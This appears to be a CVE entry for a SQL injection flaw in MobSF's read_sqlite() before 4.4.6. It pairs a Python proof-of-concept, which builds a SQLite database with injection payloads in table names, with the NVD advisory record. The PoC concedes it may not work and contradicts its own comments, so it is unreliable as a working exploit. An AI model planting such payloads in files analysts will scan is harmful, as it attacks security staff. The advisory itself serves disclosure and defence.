CVE-2026-33545

import sqlite3 # PoC: Create a malicious SQLite database to trigger SQL Injection in MobSF < 4.4.6 # The vulnerability exists in read_sqlite() where table names from sqlite_master # are interpolated into a SQL query using string formatting (%s). def create_malicious_db(): conn = sqlite3.connect('malicious_mobsf.db') cursor = conn.cursor() # Attacker attempts to create a table with a payload as the name. # Note: SQLite imposes strict limits on table names, but an attacker # might manipulate the DB file binary or use specific techniques to # achieve a name that breaks out of the query context in MobSF. # Example payload intended for the query: SELECT * FROM %s # Payload: 'non_existent_table; DROP TABLE test--' malicious_payload = "test) UNION SELECT 1,2,3--" try: # Standard creation might fail due to syntax, but the concept is injecting # this string into the query context. # In a real exploit, the attacker crafts the sqlite_master entry. query = f"CREATE TABLE '{malicious_payload}' (data TEXT)" cursor.execute(query) conn.commit() print(f"[+] Created database with potentially malicious table name structure.") except Exception as e: print(f"[-] Standard creation blocked by SQLite: {e}") print("[!] Exploit requires crafting the DB binary or specific manipulation.") conn.close() if __name__ == "__main__": create_malicious_db()

{"cve": {"id": "CVE-2026-33545", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:06.047", "lastModified": "2026-04-03T20:28:05.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MobSF is a mobile application security testing tool used. Prior to version 4.4.6, MobSF's `read_sqlite()` function in `mobsf/MobSF/utils.py` (lines 542-566) uses Python string formatting (`%`) to construct SQL queries with table names read from a SQLite database's `sqlite_master` table. When a security analyst uses MobSF to analyze a malicious mobile application containing a crafted SQLite database, attacker-controlled table names are interpolated directly into SQL queries without parameterization or escaping. This allows an attacker to cause denial of service and achieve SQL injection. Version 4.4.6 patches the issue."}, {"lang": "es", "value": "MobSF es una herramienta utilizada para pruebas de seguridad de aplicaciones móviles. Antes de la versión 4.4.6, la función `read_sqlite()` de MobSF en `mobsf/MobSF/utils.py` (líneas 542-566) utiliza el formato de cadena de Python ('%') para construir consultas SQL con nombres de tabla leídos de la tabla `sqlite_master` de una base de datos SQLite. Cuando un analista de seguridad utiliza MobSF para analizar una aplicación móvil maliciosa que contiene una base de datos SQLite manipulada, los nombres de tabla controlados por el atacante se interpolan directamente en las consultas SQL sin parametrización ni escape. Esto permite a un atacante causar denegación de servicio y lograr inyección SQL. La versión 4.4.6 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensecurity:mobile_security_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.6", "matchCriteriaId": "5848A16B-0512-4FBE-8D64-7D14DDCA8625"}]}]}], "references": [{"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6f8a43c1b78d21cfbd7186aaafa7f622d990e0f1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-hqjr-43r5-9q58", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}